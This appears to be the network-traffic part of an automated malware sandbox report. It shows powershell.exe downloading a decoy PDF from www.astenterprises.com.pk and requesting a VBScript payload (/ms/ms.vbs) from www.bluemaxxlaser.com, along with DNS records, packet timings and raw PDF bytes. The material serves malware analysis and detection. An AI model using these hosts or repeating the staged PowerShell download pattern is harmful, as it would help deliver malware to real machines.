Dec 19, 2024 12:48:01.513273954 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.513273954 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.519778013 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.519856930 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.519881010 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.519900084 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.519932985 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.519954920 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.526052952 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.526099920 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.526143074 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.526156902 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.526184082 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.526204109 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.532159090 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.532207012 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.532247066 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.532262087 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.532289028 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.532310963 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.538794994 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.538861990 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.538885117 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.538908005 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.538937092 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.538958073 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.544630051 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.544682026 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.544723034 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.544742107 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.544770002 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.544872999 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.693171978 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.693197012 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.693264008 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.693279028 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.693315983 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.699255943 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.699274063 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.699328899 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.699337006 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.699369907 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.705081940 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.705099106 CET  443          49710      107.161.23.150  192.168.2.6
Dec 19, 2024 12:48:01.705172062 CET  49710        443        192.168.2.6     107.161.23.150
Dec 19, 2024 12:48:01.705180883 CET  443          49710      107.161.23.150  192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.705210924 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.711694002 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.711716890 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.711772919 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.711781025 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.711790085 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.712027073 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.718122959 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.718139887 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.718219995 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.718226910 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.718270063 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.724431038 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.724447966 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.724508047 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.724514961 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.724553108 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.730870962 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.730887890 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.730952024 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.730958939 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.730995893 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.736684084 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.736707926 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.736757994 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.736766100 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.736782074 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.736804008 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.885763884 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.885791063 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.885859013 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.885890007 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.885906935 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.885926008 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.891874075 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.891892910 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.892148972 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.892184019 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.892237902 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.898519993 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.898538113 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.898621082 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.898633957 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.898673058 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.904084921 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.904119015 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.904175997 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.904185057 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.904208899 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.904222012 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.910823107 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.910867929 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.910926104 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.910948992 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.910981894 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.911489964 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.916852951 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.916899920 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.916937113 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.916953087 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.917006969 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.917006969 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.923455954 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.923505068 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.923541069 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.923556089 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.923587084 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.923607111 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.929958105 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.930002928 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.930052996 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.930067062 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.930113077 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.931493044 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.078474998 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.078572989 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.078613997 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.078643084 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.078671932 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.078691006 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.084295988 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.084353924 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.084378958 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.084391117 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.084419012 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.084438086 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.090754986 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.090801001 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.090858936 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.090871096 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.090895891 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.090914965 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.096611023 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.096656084 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.096693039 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.096704960 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.096731901 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.096749067 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.103168011 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.103216887 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.103255987 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.103267908 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.103296041 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.103333950 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.109272957 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.109316111 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.109352112 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.109364986 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.109390974 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.111489058 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.115895987 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.115956068 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.115978956 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.115992069 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.116063118 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.116063118 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.122380018 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.122422934 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.122459888 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.122472048 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.122498035 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.122536898 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.123610020 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.123699903 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.123713970 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.123766899 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.123773098 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.123826027 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.126240969 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.511250973 CET4972180192.168.2.6203.175.174.69
                                                                                        Dec 19, 2024 12:48:02.631263971 CET8049721203.175.174.69192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.631356955 CET4972180192.168.2.6203.175.174.69
                                                                                        Dec 19, 2024 12:48:02.635452986 CET4972180192.168.2.6203.175.174.69
                                                                                        Dec 19, 2024 12:48:02.755278111 CET8049721203.175.174.69192.168.2.6
                                                                                        Dec 19, 2024 12:48:04.165550947 CET8049721203.175.174.69192.168.2.6
                                                                                        Dec 19, 2024 12:48:04.210982084 CET4972180192.168.2.6203.175.174.69
                                                                                        Dec 19, 2024 12:48:05.727544069 CET4972180192.168.2.6203.175.174.69
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 19, 2024 12:47:58.689100981 CET | 56539 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 19, 2024 12:47:58.826335907 CET | 53 | 56539 | 1.1.1.1 | 192.168.2.6 |
| Dec 19, 2024 12:48:02.266480923 CET | 55123 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 19, 2024 12:48:02.510039091 CET | 53 | 55123 | 1.1.1.1 | 192.168.2.6 |
| Dec 19, 2024 12:48:12.930546045 CET | 55252 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 19, 2024 12:48:28.100707054 CET | 64339 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 19, 2024 12:48:52.181032896 CET | 57068 | 53 | 192.168.2.6 | 1.1.1.1 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 19, 2024 12:47:58.689100981 CET | 192.168.2.6 | 1.1.1.1 | 0xa593 | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:48:02.266480923 CET | 192.168.2.6 | 1.1.1.1 | 0x78cc | Standard query (0) | www.bluemaxxlaser.com | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:48:12.930546045 CET | 192.168.2.6 | 1.1.1.1 | 0xcf6c | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:48:28.100707054 CET | 192.168.2.6 | 1.1.1.1 | 0xe41b | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:48:52.181032896 CET | 192.168.2.6 | 1.1.1.1 | 0xf0d2 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 19, 2024 12:47:58.826335907 CET | 1.1.1.1 | 192.168.2.6 | 0xa593 | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 19, 2024 12:47:58.826335907 CET | 1.1.1.1 | 192.168.2.6 | 0xa593 | No error (0) | astenterprises.com.pk | | 107.161.23.150 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:48:02.510039091 CET | 1.1.1.1 | 192.168.2.6 | 0x78cc | No error (0) | www.bluemaxxlaser.com | | 203.175.174.69 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:48:13.068824053 CET | 1.1.1.1 | 192.168.2.6 | 0xcf6c | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 19, 2024 12:48:28.239095926 CET | 1.1.1.1 | 192.168.2.6 | 0xe41b | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 19, 2024 12:48:52.317977905 CET | 1.1.1.1 | 192.168.2.6 | 0xf0d2 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 19, 2024 12:49:28.409857988 CET | 1.1.1.1 | 192.168.2.6 | 0xee2 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 19, 2024 12:49:28.409857988 CET | 1.1.1.1 | 192.168.2.6 | 0xee2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.211.18 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:49:28.409857988 CET | 1.1.1.1 | 192.168.2.6 | 0xee2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.99 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:49:28.409857988 CET | 1.1.1.1 | 192.168.2.6 | 0xee2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.101 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:49:28.409857988 CET | 1.1.1.1 | 192.168.2.6 | 0xee2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.98 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:49:28.409857988 CET | 1.1.1.1 | 192.168.2.6 | 0xee2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.209.66 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:49:28.409857988 CET | 1.1.1.1 | 192.168.2.6 | 0xee2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.100 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:49:52.504728079 CET | 1.1.1.1 | 192.168.2.6 | 0x3c7b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Dec 19, 2024 12:49:52.504728079 CET | 1.1.1.1 | 192.168.2.6 | 0x3c7b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
• www.astenterprises.com.pk
• www.bluemaxxlaser.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49721 | 203.175.174.69 | 80 | 3924 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |

Timestamp: Dec 19, 2024 12:48:02.635452986 CET, Bytes transferred: 80, Direction: OUT
GET /ms/ms.vbs HTTP/1.1
Host: www.bluemaxxlaser.com
Connection: Keep-Alive

Timestamp: Dec 19, 2024 12:48:04.165550947 CET, Bytes transferred: 516, Direction: IN
HTTP/1.1 404 Not Found
Date: Thu, 19 Dec 2024 11:48:03 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                        0          | 192.168.2.6 | 49710       | 107.161.23.150 | 443              | 3924 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp               | Bytes transferred | Direction | Data
                                                                                        2024-12-19 11:48:00 UTC | 127               | OUT       | GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                        Host: www.astenterprises.com.pk
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-19 11:48:00 UTC | 217               | IN        | HTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        content-type: application/pdf
                                                                                        last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 871324
                                                                                        date: Thu, 19 Dec 2024 11:48:00 GMT
                                                                                        server: LiteSpeed
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                        Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                        Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                        Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
